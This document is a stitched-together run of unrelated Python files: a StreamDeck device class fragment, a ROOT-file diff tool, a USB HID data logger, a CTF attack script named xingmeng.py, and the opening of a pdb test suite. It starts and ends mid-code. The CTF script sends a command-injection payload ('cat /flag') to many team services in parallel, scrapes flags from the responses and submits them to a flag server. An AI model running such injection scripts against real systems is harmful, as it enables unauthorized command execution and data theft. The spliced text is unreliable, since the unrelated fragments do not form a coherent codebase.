self.KEY_ROTATION, } def set_key_callback(self, callback): """ Sets the callback function called each time a button on the StreamDeck changes state (either pressed, or released). .. note:: This callback will be fired from an internal reader thread. Ensure that the given callback function is thread-safe. .. note:: Only one callback can be registered at one time. .. seealso:: See :func:`~StreamDeck.set_key_callback_async` method for a version compatible with Python 3 `asyncio` asynchronous functions. :param function callback: Callback function to fire each time a button state changes. """ self.key_callback = callback def set_key_callback_async(self, async_callback, loop=None): """ Sets the asynchronous callback function called each time a button on the StreamDeck changes state (either pressed, or released). The given callback should be compatible with Python 3's `asyncio` routines. .. note:: The asynchronous callback will be fired in a thread-safe manner. .. note:: This will override the callback (if any) set by :func:`~StreamDeck.set_key_callback`. :param function async_callback: Asynchronous callback function to fire each time a button state changes. :param function loop: Asyncio loop to dispatch the callback into """ import asyncio loop = loop or asyncio.get_event_loop() def callback(*args): asyncio.run_coroutine_threadsafe(async_callback(*args), loop) self.set_key_callback(callback) def key_states(self): """ Retrieves the current states of the buttons on the StreamDeck. :rtype: list(bool) :return: List describing the current states of each of the buttons on the device (`True` if the button is being pressed, `False` otherwise). 
""" return self.last_key_states @abstractmethod def reset(self): """ Resets the StreamDeck, clearing all button images and showing the standby image. """ pass @abstractmethod def set_brightness(self, percent): """ Sets the global screen brightness of the StreamDeck, across all the physical buttons. :param int/float percent: brightness percent, from [0-100] as an `int`, or normalized to [0.0-1.0] as a `float`. """ pass @abstractmethod def get_serial_number(self): """ Gets the serial number of the attached StreamDeck. :rtype: str :return: String containing the serial number of the attached device. """ pass @abstractmethod def get_firmware_version(self): """ Gets the firmware version of the attached StreamDeck. :rtype: str :return: String containing the firmware version of the attached device. """ pass @abstractmethod def set_key_image(self, key, image): """ Sets the image of a button on the StreamDeck to the given image. The image being set should be in the correct format for the device, as an enumerable collection of bytes. .. seealso:: See :func:`~StreamDeck.get_key_image_format` method for information on the image format accepted by the device. :param int key: Index of the button whose image is to be updated. :param enumerable image: Raw data of the image to set on the button. If `None`, the key will be cleared to a black color. """ pass
root_diff.py
"""Calculates the difference between two ROOT (https://root.cern.ch/) files. If a difference is present, the command will create plots for the distributions that differ. TODO: separate functionality: plotting, recursive reading of ROOT files, diff calculation TODO: allow for injection of user-defined high-level variables """ from __future__ import print_function import multiprocessing as mp import os import threading import awkward as ak import click from plumbum import colors from tqdm import tqdm from skvalidate import compare from skvalidate.vis import draw_diff from skvalidate.io import write_data_to_json def _process(name, values, output_path): color = colors.red msg = compare.ERROR status = values['status'] if status == compare.FAILED: try: image = draw_diff(name, values, output_path) values['image'] = image msg = 'FAILED (reason: {}): {}'.format(values['reason'], image) except TypeError as e: msg = 'ERROR: Cannot draw (value types: {0} & {1}, reason: {2})'.format( "NoneType" if values['original'] is None else str(ak.type(values['original'])), "NoneType" if values['reference'] is None else str(ak.type(values['reference'])), str(e), ) if status == compare.UNKNOWN or status == compare.WARNING: msg = 'WARNING: Unable to compare (value type: {0}, reason: {1})'.format( "Unknown" if values['original'] is None else str(ak.type(values['original'])), values['reason'], ) color = colors.Orange3 if status == compare.SUCCESS: msg = 'OK' color = colors.green values['msg'] = msg values['color'] = color del values['original'] del values['reference'] del values['diff'] return values class MultiProcessStatus(object): def __init__(self, comparison, n_processes, output_path): self.comparison = comparison self.pool = mp.Pool(n_processes) self.n_cores = n_processes self.output_path = output_path self.n_comparisons = len(comparison) self.pbar = tqdm(self.n_comparisons) def runMultiProcessing(self): print('Testing {0} distributions'.format(self.n_comparisons)) results = {} for name in sorted(self.comparison.keys()): result = self.pool.apply_async( _process, args=(name, self.comparison[name], self.output_path), callback=self._update, ) results[name] = result self.pool.close() self.pool.join() for name in results.keys(): self.comparison[name] = results[name].get() def runSingleCore(self): print('Testing {0} distributions'.format(self.n_comparisons)) for name in sorted(self.comparison.keys()): result = _process(name, self.comparison[name], self.output_path) self.comparison[name] = result def run(self): if self.n_cores > 1: self.runMultiProcessing() else: self.runSingleCore() def runMultiThread(self): print('Testing {0} distributions'.format(self.n_comparisons)) threads = {} for name in sorted(self.comparison.keys()): thread = threading.Thread(target=_process, args=(name, self.comparison[name], self.output_path)) thread.daemon = True thread.start() threads[name] = thread for name, thread in threads.items(): thread.join() self._update() self.comparison[name] = thread.values def _update(self, *a): self.pbar.update() def terminate(self): self.pool.terminate() self.pool.join() @click.command() @click.argument('file_under_test', type=click.Path(exists=True)) @click.argument('reference_file', type=click.Path(exists=True)) @click.option('-o', '--output-path', type=click.Path(exists=True), required=True) @click.option('-r', '--report-file', type=click.Path(), default='root_comparison.json') @click.option('-p', '--prefix', default=os.environ.get('CI_JOB_NAME', 'root_diff')) @click.option('-n', '--n-cores', default=1, 
type=int, help='Experimental feature: use n number of cores') def cli(file_under_test, reference_file, output_path, report_file, prefix, n_cores): # TODO add verbosity setting # TODO: add parameter for distributions that are allowed to fail (e.g. timestamps) # TODO: throw error if any distribution fails summary = {} for name, comparison in compare.compare_two_root_files(file_under_test, reference_file): comparison = _reset_infinities(comparison) if comparison is None: continue result = _process(name, comparison, output_path) print(result['color'] | f'{name} - {result["msg"]}') del result['color'] # delete, as we cannot JSON it summary[name] = result # processing = MultiProcessStatus(comparison, n_cores, output_path) # try: # processing.run() # except KeyboardInterrupt: # processing.terminate() # summary = _add_summary(processing.comparison, prefix) summary = _add_summary(summary, prefix) summary[prefix]['output_path'] = output_path # TODO: print nice summary write_data_to_json(summary, report_file) def _reset_infinities(comparison): if 'original' not in comparison or 'reference' not in comparison: return None if 'str' in str(ak.type(comparison['original'])): return None if 'str' in str(ak.type(comparison['reference'])): return None return comparison def _add_summary(comparison, prefix): summary = {} summary['distributions'] = comparison summary[compare.FAILED] = [] summary[compare.UNKNOWN] = [] summary[compare.WARNING] = [] summary[compare.SUCCESS] = [] summary[compare.ERROR] = [] for name, values in comparison.items(): status = values['status'] summary[status].append(name) return {prefix: summary}
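
# --- Hedged usage note (not part of this file) ---
# The click command above is normally run from the shell, e.g.:
#   python root_diff.py new.root reference.root -o plots -r report.json
# It can also be driven programmatically with click's test runner; the file
# names below are placeholders and the output directory must already exist.
def _example_invoke():
    from click.testing import CliRunner
    runner = CliRunner()
    result = runner.invoke(cli, ['new.root', 'reference.root', '-o', 'plots'])
    print(result.exit_code, result.output)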
My_Listener.py
#!/usr/bin/python3 # C:\Work\Python\HID_Util\src\My_Listener.py from binascii import hexlify import sys import argparse import threading from time import perf_counter as timer import include_dll_path import hid import os from string_date_time import get_date_time from string_date_time import get_time # BOARD_TYPE_MAIN = 0, # BOARD_TYPE_JOYSTICKS = 1, # BOARD_TYPE_TOOLS_MASTER = 2, # BOARD_TYPE_STATION = 3, # BOARD_TYPE_SUITE2PRIPH = 4, # BOARD_TYPE_TOOLS_SLAVE = 5, # BOARD_TYPE_GBU = 6, # BOARD_TYPE_LAP = 7 # VENDOR_ID = 0x24b3 # Simbionix # PRODUCT_ID = 0x1005 # Simbionix MSP430 Controller # USB\VID_2047&PID_0302&REV_0200 VENDOR_ID = 0x2047 # Texas Instruments PRODUCT_ID = 0x0302 # Joystick. PRODUCT_ID_JOYSTICK = 0x0302 # Joystick. PRODUCT_ID_ROUTER = 0x0301 # Router PRODUCT_ID_STATION = 0x0304 PRODUCT_ID_LAP_NEW_CAMERA = 0x2005 # 2021_01_24 # USB\VID_24B3&PID_2005&REV_0200 # 0x24B3 = 9395 # 0x2005 = 8197 # VENDOR_ID = 0x24b3 # Simbionix # PRODUCT_ID = 0x2005 # LAP_NEW_CAMERA. PRODUCT_ID_types = { 0x0302: "BOARD_TYPE: Joystick/Universal", 0x0301: "BOARD_TYPE: Router/Main", 0x0304: "BOARD_TYPE: STATION", 0x0303: "BOARD_TYPE: TOOLS_MASTER", 0x0305: "BOARD_TYPE: SUITE2PRIPH", 0x0306: "BOARD_TYPE: TOOLS_SLAVE", 0x0307: "BOARD_TYPE: GBU", 0x0308: "BOARD_TYPE: LAP camera", 0x2005: "BOARD_TYPE: PRODUCT_ID_LAP_NEW_CAMERA", #board type is enforced in FW (descriptors.h) 0x1965: "yosi" } # FILE1_PATH = "log\hid_log.csv" FILE1_PATH = "log\Listener_" # log.csv" start_date_time = get_date_time() FILE1_PATH = FILE1_PATH + start_date_time + ".csv" print("Recording result at: ", FILE1_PATH, "\n") if not os.path.exists('log'): os.makedirs('log') # file1 = None # open recording log file: # file1 = open("C:\Work\Python\HID_Util\src\log\log.csv","w") file1 = open(FILE1_PATH,"w") # file1 = open("log\hid_log.csv","w") hid_util_fault = 0 print_every = 0 prev_gbu_counter = 0 prev_gbu_counter_change_time = 0 READ_SIZE = 64 # The size of the packet READ_TIMEOUT = 2 # 2ms WRITE_DATA = bytes.fromhex("3f3ebb00b127ff00ff00ff00ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") DEFAULT_WRITE_DATA = WRITE_DATA WRITE_DATA_CMD_I = bytes.fromhex("3f3ebb00b127ff00ff00ff0049ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # start streaming command: # 3f 04 82 00 00 WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") WRITE_DATA_CMD_START_ = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # start streaming command for station 0x303: WRITE_DATA_CMD_START_0x304 = bytes.fromhex("3f048d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # Get Board Type command: # 01h 00h 00h 01h WRITE_DATA_CMD_GET_BOARD_TYPE = bytes.fromhex("3f040100000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # WRITE_DATA_CMD_START = bytes.fromhex("3f048200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") 
#.........................................................##........................................ WRITE_DATA_CMD_S = bytes.fromhex("3f3ebb00b127ff00ff00ff0053ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # 'A' - keep Alive + fast BLE update (every 20 msec) WRITE_DATA_CMD_A = bytes.fromhex("3f3ebb00b127ff00ff00ff0041ff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # moderate BLE update rate every 50 mSec by 'M' command WRITE_DATA_CMD_M = bytes.fromhex("3f3ebb00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") # set_BSL_mode # WRITE_DATA_CMD_B = bytes.fromhex("3f3eaa00b127ff00ff00ff004dff33ff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") #0xAA Run BSL WRITE_DATA_CMD_B = bytes.fromhex("3f04aa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") SLEEP_AMOUNT = 0.002 # Read from HID every 2 milliseconds PRINT_TIME = 1.0 # Print every 1 second # PRINT_TIME = 0.5 # Print every 0.5 second #PRINT_TIME = 2 # Print every 2 second START_INDEX = 2 + 4 # Ignore the first two bytes, then skip the version (4 bytes) # ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 4 * 2 + 1, 2)) + [START_INDEX + 6 * 2,] ANALOG_INDEX_LIST = list(range(START_INDEX + 2, START_INDEX + 8 * 2 + 1, 2)) print("ANALOG_INDEX_LIST=",ANALOG_INDEX_LIST) # ANALOG_INDEX_LIST= [8, 10, 12, 14, 16, 18, 20, 22] LAP_ANALOG_INDEX_LIST = list(range(2,8 * 2 + 1, 2)) COUNTER_INDEX = 2 + 22 + 18 # Ignore the first two bytes, then skip XData1 (22 bytes) and OverSample (==XDataSlave1; 18 bytes) CMOS_INDEX = 2 + 2 # maybe + 4??? GBU_COUNTER_INDEX = 52 # 0 1 2 3 4 5 6 7 8 9 1011 # Received data: b'3f26 00 00 00 00 0674fc41 3f4efc70 0033a4513c5a0101210001000000650000000000000000000000167f070dd7aee89baff63fedcfcccb763acf041b00000010' # TORQUE INSERTION # global variables special_cmd = 0 def gui_loop(device): global prev_gbu_counter_change_time do_print = True print_time = 0.0 time = timer() handle_time = timer() write_time_capture = timer() prev_gbu_counter_change_time = timer() gbu_counter_change_time = timer() skip_write = 0 prev_counter = 0 send_stream_request_command_once = 1 # cnt = None # prev_cnt = None # value = None global special_cmd # global print_flag while True: # Reset the counter if (do_print): print_time = timer() # Write to the device # if send_stream_request_command_once == 1: # send_stream_request_command_once = 0 # if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA: # print("enforce streaming of data with command 0x82" # if device is attached enforce streaming of data. 
# device.write(WRITE_DATA_CMD_START) if special_cmd == 'I': if PRODUCT_ID == PRODUCT_ID_STATION: WRITE_DATA = WRITE_DATA_CMD_START_0x304 else: WRITE_DATA = WRITE_DATA_CMD_START device.write(WRITE_DATA) print("special_cmd Start") special_cmd = 0 # elif special_cmd == 'S': # WRITE_DATA = WRITE_DATA_CMD_GET_BOARD_TYPE # device.write(WRITE_DATA) # print("special_cmd CMD_GET_BOARD_TYPE") # # print_flag = 1 # special_cmd = 0 # elif special_cmd == 'A': # WRITE_DATA = WRITE_DATA_CMD_A # print("special_cmd A -> keep Alive + fast BLE update (every 20 msec)") # special_cmd = 0 # elif special_cmd == 'M': # WRITE_DATA = WRITE_DATA_CMD_M # print("special_cmd M -> moderate BLE update rate every 50 mSec") # special_cmd = 0 # elif special_cmd == 'B': # WRITE_DATA = WRITE_DATA_CMD_B # device.write(WRITE_DATA) # print("special_cmd B -> set_BSL_mode --- this will stop HID communication with this GUI") # special_cmd = 0 # else: # WRITE_DATA = DEFAULT_WRITE_DATA cycle_time = timer() - time # print("cycle timer: %.10f" % cycle_time) # If not enough time has passed, sleep for SLEEP_AMOUNT seconds sleep_time = SLEEP_AMOUNT - (cycle_time) # Measure the time time = timer() # print(" ") # Read the packet from the device value = device.read(READ_SIZE, timeout=READ_TIMEOUT) # Update the GUI if len(value) >= READ_SIZE: # save into file: analog = [(int(value[i + 1]) << 8) + int(value[i]) for i in LAP_ANALOG_INDEX_LIST] channel_0 = analog[0] channel_1 = analog[1] channel_2 = analog[2] channel_3 = analog[3] channel_4 = analog[4] counter = (int(value[COUNTER_INDEX + 1]) << 8) + int(value[COUNTER_INDEX]) count_dif = counter - prev_counter GBU_COUNTER_INDEX = 2+51 # need to add 2 since we have two bytes of lengths. gbu_counter = (int(value[GBU_COUNTER_INDEX + 1]) << 8) + int(value[GBU_COUNTER_INDEX]) gbu_counter2 = (int(value[GBU_COUNTER_INDEX]) << 8) + int(value[GBU_COUNTER_INDEX+1]) global file1 global prev_gbu_counter # global prev_gbu_counter_change_time #if count_dif > 1 : # L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), " <<<<<--- " ,"\n" ] #else: # L = [ str(counter),", ", str(clicker_analog), ", " , str(count_dif), "\n" ] L = [ str(channel_0),", ", str(channel_1), ", " , str(channel_2),", " , str(channel_3),", " , str(channel_4), "\n" ] # file1.writelines(L) # handler(value, do_print=do_print) # print("Received data: %s" % hexlify(value)) Handler_Called = (timer() - handle_time) if Handler_Called > 0.002 : # if Handler_Called > 0.02 : #print("handler called: %.6f" % Handler_Called) global print_every if gbu_counter2 != prev_gbu_counter: # check for 0x3f35ff0f then the rest if value[0] == 0x3f and value[1] == 0x35 and value[2] == 0xff and value[3] == 0x0f: print_every = 200 delta_time = timer() - prev_gbu_counter_change_time gbu_counter_change_time = timer() # print_every = print_every + 1 if print_every >= 200: print_every = 0 print("delta_time: %.1f" % delta_time, end="") L1 = [str(delta_time), "\n"] delta_time_str = "%.1f" %delta_time # save only 1 digit after decimal point event_time = get_time() L1 = [delta_time_str, " ",event_time, "\n"] # global FILE1_PATH # file1 = open(FILE1_PATH,"w") file1.writelines(L1) # file1.close() # print(" Received data: %s" % str(gbu_counter)) # print(" Received data: %06x" % gbu_counter) # print(" Received data: %06x " % gbu_counter2 + "%f" %v) print(" Received data: %06d" % gbu_counter2 + " time: %s" %event_time) print(" Received data: %s" % hexlify(value)) if value[0] == 0x3f and value[1] == 0x35 and value[2] == 0xff and value[3] == 0x0f: prev_gbu_counter = 
gbu_counter2 prev_gbu_counter_change_time = gbu_counter_change_time # print("time: %.6f" % time) handle_time = timer() prev_counter = counter # Update the do_print flag do_print = (timer() - print_time) >= PRINT_TIME def handler(value, do_print=False): if do_print: print("Received data: %s" % hexlify(value)) return # do without gui PROGRESS_BAR_LEN = 300 LONG_PROGRESS_BAR_LEN = 590 def init_parser(): parser = argparse.ArgumentParser( description="Read the HID data from target board.\nIf no argument is given, the program exits." ) parser.add_argument( "-v", "--vendor", dest="vendor_id", metavar="VENDOR_ID", type=int, nargs=1, required=False, help="connects to the device with the vendor ID" ) parser.add_argument( "-p", "--product", dest="product_id", metavar="PRODUCT_ID", type=int, nargs=1, required=False, help="connects to the device with that product ID" ) parser.add_argument( "-a", "--path", dest="path", metavar="PATH", type=str, nargs=1, required=False, help="connects to the device with the given path" ) return parser def main(): global VENDOR_ID global PRODUCT_ID PATH = None # open recording log file: # file1 = open("C:\Work\Python\HID_Util\src\log\log2.txt","w") # Parse the command line arguments parser = init_parser() args = parser.parse_args(sys.argv[1:]) # Initialize the flags according from the command line arguments avail_vid = args.vendor_id != None avail_pid = args.product_id != None avail_path = args.path != None id_mode = avail_pid and avail_vid path_mode = avail_path default_mode = (not avail_vid) and (not avail_pid) and (not avail_path) if (path_mode and (avail_pid or avail_vid)): print("The path argument can't be mixed with the ID arguments") return if ((not avail_path) and ((avail_pid and (not avail_vid)) or ((not avail_pid) and avail_vid))): print("Both the product ID and the vendor ID must be given as arguments") return if (default_mode): print("No arguments were given, defaulting to:") print("VENDOR_ID = %X" % VENDOR_ID) print("PRODUCT_ID = %X" % PRODUCT_ID) id_mode = True elif (id_mode): VENDOR_ID = args.vendor_id[0] PRODUCT_ID = args.product_id[0] #run over with 772 == 0x304 elif (path_mode): PATH = args.path[0] else: raise NotImplementedError device = None try: if (id_mode): try: print("try with default device:") print("VENDOR_ID = %X" % VENDOR_ID) print("PRODUCT_ID = %X" % PRODUCT_ID) device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID) except: print("wrong ID") print(" ") # 0x24B3 = 9395 # 0x2005 = 8197 for n in range(7): if device is None: try: # print("try with other device") VENDOR_ID = 0x24b3 # Simbionix PRODUCT_ID = 0x2000 + n # LAP_NEW_CAMERA. 
is 0x2005 # print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID) print("try with PID = %X " % PRODUCT_ID) # print("PRODUCT_ID = %X" % PRODUCT_ID) device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID) # device = hid.Device(vid=0x24B3, pid=0x2005) # print("success vid=0x24B3, pid=0x2005 !!") except: print("wrong ID2") # VENDOR_ID = 2047 # PRODUCT_ID = 304 # 0x2047 = 8263 # 0x304 = 772 # 0x0301 // Product ID (PID) - base for Prime products family for n in range(len(PRODUCT_ID_types)): if device is None: try: # print("try with other device") VENDOR_ID = 0x2047 # Texas Instrument PRODUCT_ID = 0x301 + n # BOARD_TYPE_MAIN is 0x301 # print("VID = %X PID = %X " % VENDOR_ID, PRODUCT_ID) print("try with PID = %X " % PRODUCT_ID) # print("PRODUCT_ID = %X" % PRODUCT_ID) device = hid.Device(vid=VENDOR_ID, pid=PRODUCT_ID) # device = hid.Device(vid=0x24B3, pid=0x2005) # print("success vid=0x24B3, pid=0x2005 !!") except: print("wrong ID2") if device is None: print("no device attached") else: print("VENDOR_ID = %X" % VENDOR_ID) print("PRODUCT_ID = %X" % PRODUCT_ID) if PRODUCT_ID in PRODUCT_ID_types: print(PRODUCT_ID_types[PRODUCT_ID]) global special_cmd if PRODUCT_ID == PRODUCT_ID_LAP_NEW_CAMERA: special_cmd = 'I' elif (path_mode): device = hid.Device(path=PATH) else: raise NotImplementedError print(" ") print(" --------------------------------------") print(" Please press <Enter> to stop recording") print(" --------------------------------------") print(" ") # Create thread that calls threading.Thread(target=gui_loop, args=(device,), daemon=True).start() input() print("Recording start: ", start_date_time) print("Recording end : ", get_date_time()) print("\n","Recording result at: ", FILE1_PATH) finally: global file1 file1.close() #to change file access modes if device != None: device.close() if __name__ == "__main__": main()
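
# --- Hedged equivalence sketch (not part of this script) ---
# The byte arithmetic in gui_loop, ``(value[i + 1] << 8) + value[i]``, reads an
# unsigned 16-bit little-endian integer at offset i. The analog block covered
# by LAP_ANALOG_INDEX_LIST (offsets 2..16) can therefore be decoded in a single
# struct call; this helper is illustrative and unused by the script.
import struct

def _decode_lap_analog(packet):
    # eight consecutive little-endian uint16 samples starting at byte 2
    return struct.unpack_from('<8H', packet, 2)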
xingmeng.py
# Author: HeliantHuS
# IDE: VIM
# System Env: Kali Linux

import requests
import re
import threading

# submit flag address
flagServer = ""
# Flag Server Token
token = ""

# Attack: main attack function
def Attack(target: str, payload: dict):
    try:
        data = payload
        response = requests.post(target, data=data).content.decode()
        flag = re.findall("flag{.*?}", response, re.S)
        if len(flag) > 0:
            flag = flag[0]
            print(f"[+]{target}: {flag}")
            SubmitFlag(target, flag)
        else:
            # no flag in the response; nothing to submit
            # (the original left this branch empty, which is a SyntaxError)
            pass
    except Exception:
        pass

# SubmitFlag: submit a captured flag to the flag server
def SubmitFlag(target: str, flag: str):
    # request header: application/json
    headers = {
        "Content-Type": "application/json; charset=UTF-8"
    }
    data = {
        "flag": flag,
        "token": token
    }
    # send the payload as JSON to match the Content-Type header
    # (the original form-encoded it with data=data)
    response = requests.post(flagServer, headers=headers, json=data).json()
    # print directly instead of relying on shell redirection
    print(f"{target}, {response}")
    with open("result.txt", "a+") as fp:
        fp.write(f"[+]{target}, {response} \n")

# ItemDWList: build the target list (example helper)
def ItemDWList(start, end, me):
    return [f"http://127.0.0.1:1{str(i).rjust(2, '0')}80" for i in range(start, end+1) if i != me]

if __name__ == "__main__":
    # target list
    dw = []
    # dw example
    # print(ItemDWList(1, 16, 1))
    payload = {
        "test": "cat /flag"
    }
    threads = []
    for i in dw:
        t = threading.Thread(target=Attack, args=(i, payload))
        t.start()
        threads.append(t)
    # join after starting all threads so the attacks run concurrently
    # (joining inside the start loop would serialize them)
    for t in threads:
        t.join()
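
# --- Hedged usage note (not part of the original script) ---
# ``dw`` above is intentionally left empty; it can be populated with the
# helper, e.g. for a sixteen-team range while skipping our own box (team 1):
def _example_targets():
    targets = ItemDWList(1, 16, 1)
    # first entry: 'http://127.0.0.1:10280' (team 2); team 1 is excluded
    return targets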
test_pdb.py
# -*- coding: utf-8 -*- from __future__ import print_function import bdb import inspect import os.path import re import sys import traceback from io import BytesIO import py import pytest try: from itertools import zip_longest except ImportError: from itertools import izip_longest as zip_longest # Make sure that we are really using our pdb module. # (I.e. without pytest's monkeypatched set_trace). # Do this only once though, for when this is file is copied. if not hasattr(sys.modules.get("pdb", None), "_ensured_our_pdb"): sys.modules.pop("pdb") import pdb # noqa: E402 isort:skip pdb._ensured_our_pdb = True pytest_plugins = ["pytester"] class FakeStdin: def __init__(self, lines): self.lines = iter(lines) def readline(self): try: line = next(self.lines) + '\n' sys.stdout.write(line) return line except StopIteration: return '' class ConfigTest(pdb.DefaultConfig): highlight = False use_pygments = False prompt = '# ' # because + has a special meaning in the regexp editor = 'emacs' stdin_paste = 'epaste' disable_pytest_capturing = False class ConfigWithHighlight(ConfigTest): highlight = True class ConfigWithPygments(ConfigTest): use_pygments = True class ConfigWithPygmentsAndHighlight(ConfigWithPygments, ConfigWithHighlight): pass class PdbTest(pdb.Pdb): use_rawinput = 1 def __init__(self, *args, **kwds): readrc = kwds.pop("readrc", False) nosigint = kwds.pop("nosigint", True) kwds.setdefault('Config', ConfigTest) if sys.version_info >= (3, 6): super(PdbTest, self).__init__(*args, readrc=readrc, **kwds) else: super(PdbTest, self).__init__(*args, **kwds) # Do not install sigint_handler in do_continue by default. self.nosigint = nosigint def _open_editor(self, editcmd): print("RUN %s" % editcmd) def _open_stdin_paste(self, cmd, lineno, filename, text): print("RUN %s +%d" % (cmd, lineno)) print(repr(text)) def do_shell(self, arg): """Track when do_shell gets called (via "!"). This is not implemented by default, but we should not trigger it via parseline unnecessarily, which would cause unexpected results if somebody uses it. """ print("do_shell_called: %r" % arg) return self.default(arg) def set_trace_via_module(frame=None, cleanup=True, Pdb=PdbTest, **kwds): """set_trace helper that goes through pdb.set_trace. It injects Pdb into the globals of pdb.set_trace, to use the given frame. """ if frame is None: frame = sys._getframe().f_back if cleanup: pdb.cleanup() class PdbForFrame(Pdb): def set_trace(self, _frame, *args, **kwargs): super(PdbForFrame, self).set_trace(frame, *args, **kwargs) newglobals = pdb.set_trace.__globals__.copy() newglobals['Pdb'] = PdbForFrame new_set_trace = pdb.rebind_globals(pdb.set_trace, newglobals) new_set_trace(**kwds) def set_trace(frame=None, cleanup=True, Pdb=PdbTest, **kwds): """set_trace helper for tests, going through Pdb.set_trace directly.""" if frame is None: frame = sys._getframe().f_back if cleanup: pdb.cleanup() Pdb(**kwds).set_trace(frame) def xpm(): pdb.xpm(PdbTest) def runpdb(func, input): oldstdin = sys.stdin oldstdout = sys.stdout oldstderr = sys.stderr # Use __dict__ to avoid class descriptor (staticmethod). 
old_get_terminal_size = pdb.Pdb.__dict__["get_terminal_size"] if sys.version_info < (3, ): text_type = unicode # noqa: F821 else: text_type = str class MyBytesIO(BytesIO): """write accepts unicode or bytes""" encoding = 'ascii' def __init__(self, encoding='utf-8'): self.encoding = encoding def write(self, msg): if isinstance(msg, text_type): msg = msg.encode(self.encoding) super(MyBytesIO, self).write(msg) def get_unicode_value(self): return self.getvalue().decode(self.encoding).replace( pdb.CLEARSCREEN, "<CLEARSCREEN>\n" ).replace(chr(27), "^[") # Use a predictable terminal size. pdb.Pdb.get_terminal_size = staticmethod(lambda: (80, 24)) try: sys.stdin = FakeStdin(input) sys.stdout = stdout = MyBytesIO() sys.stderr = stderr = MyBytesIO() func() except InnerTestException: pass except bdb.BdbQuit: print("!! Received unexpected bdb.BdbQuit !!") except Exception: # Make it available for pytests output capturing. print(stdout.get_unicode_value(), file=oldstdout) raise finally: sys.stdin = oldstdin sys.stdout = oldstdout sys.stderr = oldstderr pdb.Pdb.get_terminal_size = old_get_terminal_size stderr = stderr.get_unicode_value() if stderr: # Make it available for pytests output capturing. print(stdout.get_unicode_value()) raise AssertionError("Unexpected output on stderr: %s" % stderr) return stdout.get_unicode_value().splitlines() def extract_commands(lines): cmds = [] prompts = {'# ', '(#) ', '((#)) ', '(((#))) '} for line in lines: for prompt in prompts: if line.startswith(prompt): cmds.append(line[len(prompt):]) continue return cmds shortcuts = [ ('[', '\\['), (']', '\\]'), ('(', '\\('), (')', '\\)'), ('^', '\\^'), ('<COLORCURLINE>', r'\^\[\[44m\^\[\[36;01;44m *[0-9]+\^\[\[00;44m'), ('<COLORNUM>', r'\^\[\[36;01m *[0-9]+\^\[\[00m'), ('<COLORLNUM>', r'\^\[\[36;01m'), ('<COLORRESET>', r'\^\[\[00m'), ('NUM', ' *[0-9]+'), ] def cook_regexp(s): for key, value in shortcuts: s = s.replace(key, value) return s def run_func(func, expected): """Runs given function and returns its output along with expected patterns. It does not make any assertions. To compare func's output with expected lines, use `check` function. """ expected = expected.strip().splitlines() # Remove comments. 
expected = [re.split(r'\s+###', line)[0] for line in expected] commands = extract_commands(expected) expected = list(map(cook_regexp, expected)) return expected, runpdb(func, commands) def count_frames(): f = sys._getframe() i = 0 while f is not None: i += 1 f = f.f_back return i class InnerTestException(Exception): """Ignored by check().""" pass def check(func, expected): expected, lines = run_func(func, expected) maxlen = max(map(len, expected)) all_ok = True print() for pattern, string in zip_longest(expected, lines): if pattern is not None and string is not None: ok = re.match(pattern, string) else: ok = False if pattern is None: pattern = '<None>' if string is None: string = '<None>' # Use "$" to mark end of line with trailing space if re.search(r'\s+$', string): string += '$' if re.search(r'\s+$', pattern): pattern += '$' pattern = pattern.replace("\t", "\\t") string = string.replace("\t", "\\t") print(pattern.ljust(maxlen+1), '| ', string, end='') if ok: print() else: print(pdb.Color.set(pdb.Color.red, ' <<<<<')) all_ok = False assert all_ok def test_config_terminalformatter(monkeypatch): from pdb import DefaultConfig, Pdb import pygments.formatters assert DefaultConfig.use_terminal256formatter is None monkeypatch.setenv("TERM", "") p = Pdb(Config=DefaultConfig) assert p._init_pygments() is True assert isinstance(p._fmt, pygments.formatters.TerminalFormatter) p = Pdb(Config=DefaultConfig) monkeypatch.setenv("TERM", "xterm-256color") assert p._init_pygments() is True assert isinstance(p._fmt, pygments.formatters.Terminal256Formatter) class Config(DefaultConfig): use_terminal256formatter = False p = Pdb(Config=Config) assert p._init_pygments() is True assert isinstance(p._fmt, pygments.formatters.TerminalFormatter) # Cover using cached _fmt. assert p._init_pygments() is True def test_runpdb(): def fn(): set_trace() a = 1 b = 2 c = 3 return a+b+c check(fn, """ [NUM] > .*fn() -> a = 1 5 frames hidden .* # n [NUM] > .*fn() -> b = 2 5 frames hidden .* # n [NUM] > .*fn() -> c = 3 5 frames hidden .* # c """) def test_set_trace_remembers_previous_state(): def fn(): a = 1 set_trace() a = 2 set_trace(cleanup=False) a = 3 set_trace(cleanup=False) a = 4 return a check(fn, """ [NUM] > .*fn() -> a = 2 5 frames hidden .* # display a # c [NUM] > .*fn() -> a = 3 5 frames hidden .* a: 1 --> 2 # c [NUM] > .*fn() -> a = 4 5 frames hidden .* a: 2 --> 3 # c """) def test_set_trace_remembers_previous_state_via_module(): def fn(): a = 1 set_trace_via_module() a = 2 set_trace_via_module(cleanup=False) a = 3 set_trace_via_module(cleanup=False) a = 4 return a check(fn, """ [NUM] > .*fn() -> a = 2 5 frames hidden .* # display a # c [NUM] > .*fn() -> a = 3 5 frames hidden .* a: 1 --> 2 # c 